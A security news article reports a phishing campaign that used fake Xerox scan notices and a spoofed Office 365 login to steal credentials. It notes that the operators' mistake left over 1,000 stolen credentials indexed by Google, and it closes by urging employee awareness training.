A mistake by the operators of a phishing campaign has resulted in stolen credentials being accessible through Google searches. Compromised WordPress sites were used to receive stolen credentials; but the information was saved to locations accessible to the public and search engines. Search engines such as Google indexed those locations, which meant the stolen credentials could be found using a simple Google search. More than 1,000 stolen credentials could be accessed through Google searches.
The campaign was identified by researchers at Check Point and Otorio. Check Point explained in a recent blog post how the scam was conducted. The scam starts with phishing emails with a variety of templates that mimic Xerox/Xeros scan notifications. The emails were targeted and included the name of the employee in the subject line to increase the chances of the messages being opened.
The phishing emails were sent from a Linux server on Microsoft Azure, using PHP mailer and 1&1 email servers. The scammers also used compromised email accounts to send the messages. The emails included an HTML attachment with embedded JavaScript code that performed covert checks of password use.
When passwords were detected, they were harvested and exfiltrated to compromised WordPress websites. The HTML file displayed a fake Xerox/Xeros scan image that was blurred, and had an Office 365 login prompt that explained the user’s Office 365 password was required to unlock the password-protected document. After passwords were captured, users were redirected to the genuine Office 365 login page.
Compromised WordPress websites used for around 2 months and were linked to dozens of .xyz domains that hosted malicious PHP pages that processed incoming credentials.
The campaign was able to bypass Microsoft Advanced Threat Protection (APT) on Office 365 accounts and the messages were delivered to inboxes. Since the phishers used compromised websites rather than their own infrastructure, this helped them bypass security solutions, since the websites they used had good reputations.
The campaign mostly targeted organizations in the energy and construction sectors, with other target industries including healthcare and IT. While the error could indicate the operators of the campaign were novices, the researchers found similar JavaScript that had been used in other campaigns dating back to May.
The fact that these phishing emails bypassed the protections of many security solutions highlights the importance of security awareness training for employees to condition them to cautious opening emails and attachments and to carefully check any domains before entering credentials.